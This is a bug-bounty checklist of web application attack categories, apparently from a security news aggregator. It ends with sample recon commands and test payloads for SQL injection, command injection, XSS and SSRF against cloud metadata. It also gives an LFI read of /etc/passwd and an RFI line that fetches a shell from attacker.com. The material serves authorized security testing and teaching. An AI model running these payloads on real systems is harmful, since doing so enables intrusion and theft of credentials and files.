ULTIMATE WEB APP HACKING CHECKLIST FOR BUG BOUNTY HUNTERS

Your go-to arsenal of techniques, vectors, and gotchas in the wild world of bounty hunting.

🔍 Reconnaissance

✅ Subdomain Enumeration (`amass`, `subfinder`, `crt.sh`)

✅ Port Scanning (`nmap`, `rustscan`)

✅ Directory Bruteforcing (`ffuf`, `dirsearch`)

✅ Wayback Machine / Archive Recon

✅ JS File Analysis (endpoints, keys, secrets)

✅ ASN/CIDR Discovery

✅ Virtual Host Discovery

✅ Content Discovery (`robots.txt`, `sitemap.xml`)

✅ GitHub Dorking (company leaks, tokens)

✅ Search Engine Dorks (Google, Shodan, Censys)

✅ WHOIS & DNS Recon

✅ DNS Zone Transfers

💣 Injection Attacks

✅ SQL Injection (classic, blind, time-based)

✅ Command Injection (`;`, `&&`, `|`, OS injection)

✅ XML External Entity (XXE)

✅ Server-Side Template Injection (SSTI)

✅ LDAP Injection

✅ CRLF Injection

✅ HTTP Host Header Injection

✅ GraphQL Injection

✅ NoSQL Injection (MongoDB, Firebase abuse)

💥 XSS (Cross-Site Scripting)

✅ Reflected XSS

✅ Stored XSS

✅ DOM-Based XSS

✅ Self-XSS

✅ CSP Bypass Techniques

✅ Mutation XSS

✅ Angular/React/Vue-specific XSS

✅ XSS in SVG/MathML

✅ WAF/Filter Bypass Payloads

🔓 Authentication & Session

✅ Authentication Bypass

✅ 2FA Bypass Techniques

✅ Session Fixation

✅ Session Hijacking

✅ JWT Attacks (`none` alg, key confusion)

✅ Cookie Poisoning / Tampering

✅ Login CSRF

✅ Password Reset Abuse

✅ Email Enumeration

✅ Username Enumeration

✅ Brute-force/Ratelimiting Bypass

✅ MFA Abuse (fallback channels, reuse)

🔐 Authorization & Access Control

✅ Broken Access Control (BAC)

✅ Insecure Direct Object Reference (IDOR)

✅ Horizontal Privilege Escalation

✅ Vertical Privilege Escalation

✅ Role Confusion / Scope Abuse

✅ Function-level Access Control Flaws

✅ Admin Panel Access via Frontend/API

📂 File Handling & Uploads

✅ Unrestricted File Uploads

✅ Content-Type Validation Bypass

✅ Polyglot Files

✅ SVG Upload with XSS Payload

✅ Upload Path Traversal

✅ Remote File Inclusion (RFI)

✅ Local File Inclusion (LFI)

✅ File Deserialization (PHP, Java, etc.)

✅ ImageTragick (ImageMagick Exploits)

🌐 Web Infrastructure

✅ SSRF (Server-Side Request Forgery)

✅ Open Redirects

✅ CORS Misconfigurations

✅ Clickjacking (X-Frame-Options issues)

✅ Host Header Injection

✅ DNS Rebinding

✅ HTTP Request Smuggling

✅ HTTP Parameter Pollution

✅ Cache Poisoning

✅ Subdomain Takeover

✅ CDN Misconfiguration

✅ Path Traversal (`../` abuse)

🔄 Business Logic & API

✅ Logic Flaws (order bypass, payment manipulation)

✅ Race Conditions

✅ Mass Assignment

✅ Insecure API Rate Limiting

✅ Broken Object Level Authorization (BOLA)

✅ GraphQL Misconfig (introspection, object access)

✅ Unprotected Endpoints

✅ Lack of Input Validation (trust boundaries)

✅ Misuse of HTTP Verbs (`PUT`, `DELETE`, `PATCH`)

☁️ Cloud & External Services

✅ AWS/GCP/Azure Misconfig (S3 buckets, secrets)

✅ Leaky Environment Variables

✅ CI/CD Secrets (GitHub Actions, GitLab CI)

✅ Publicly Exposed Dashboards (Kibana, Grafana, Jenkins)

✅ Metadata Services Access (AWS IMDS, GCP metadata)

✅ Exposed `.env`, `.git`, `.DS_Store`, backup files

⚙️ Misc & Advanced

✅ Prototype Pollution

✅ Deserialization Attacks (PHP, Java, Ruby)

✅ WebSocket Hijacking

✅ Caching Bugs (Varnish, NGINX configs)

✅ DNS Cache Poisoning

✅ Frontend Framework Bypasses

✅ CVEs on Outdated Libraries

✅ Supply Chain Attacks

✅ Software-Specific Exploits (WordPress, Magento, etc.)

✅ Secret Discovery (API keys, tokens in source or logs)

You Should Know:

Essential Commands & Tools for Bug Bounty Hunters

Reconnaissance

 Subdomain Enumeration 
amass enum -d example.com 
subfinder -d example.com -o subs.txt

Port Scanning 
nmap -sV -p- -T4 target.com 
rustscan -a target.com --ulimit 5000

Directory Bruteforcing 
ffuf -u https://target.com/FUZZ -w wordlist.txt 
dirsearch -u https://target.com -e php,html,js 

Injection Attacks

 SQL Injection Test Payloads 
' OR '1'='1 
" OR 1=1 -- 
UNION SELECT username, password FROM users-- 

 Command Injection Test Payloads 
; whoami 
`id` 
$(cat /etc/passwd) 

XSS Payloads

<script>alert(1)</script> 
<img src=x onerror=alert(1)> 
javascript:alert(document.domain) 

SSRF Exploitation

 Testing SSRF 
curl "http://vulnerable.com/fetch?url=http://169.254.169.254/latest/meta-data" 

File Inclusion (LFI/RFI)

 LFI Test 
curl "http://target.com/page.php?file=../../../../etc/passwd"

RFI Test 
curl "http://target.com/page.php?file=http://attacker.com/shell.txt" 

JWT Tampering

 None Algorithm Attack 
echo -n '{"alg":"none"}' | base64 

Cloud Misconfigurations

 Checking AWS S3 Buckets 
aws s3 ls s3://bucket-name/ 

What Undercode Say:

This checklist is a goldmine for bug bounty hunters and security researchers. Mastering these techniques requires hands-on practice. Always test in authorized environments and follow ethical guidelines. Automation helps, but manual testing uncovers the most critical flaws. Stay updated with new attack vectors and CVEs.

Expected Output:

A structured, actionable guide for web app penetration testing with verified commands and techniques.

References:

Reported By: Wesley Thijs – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram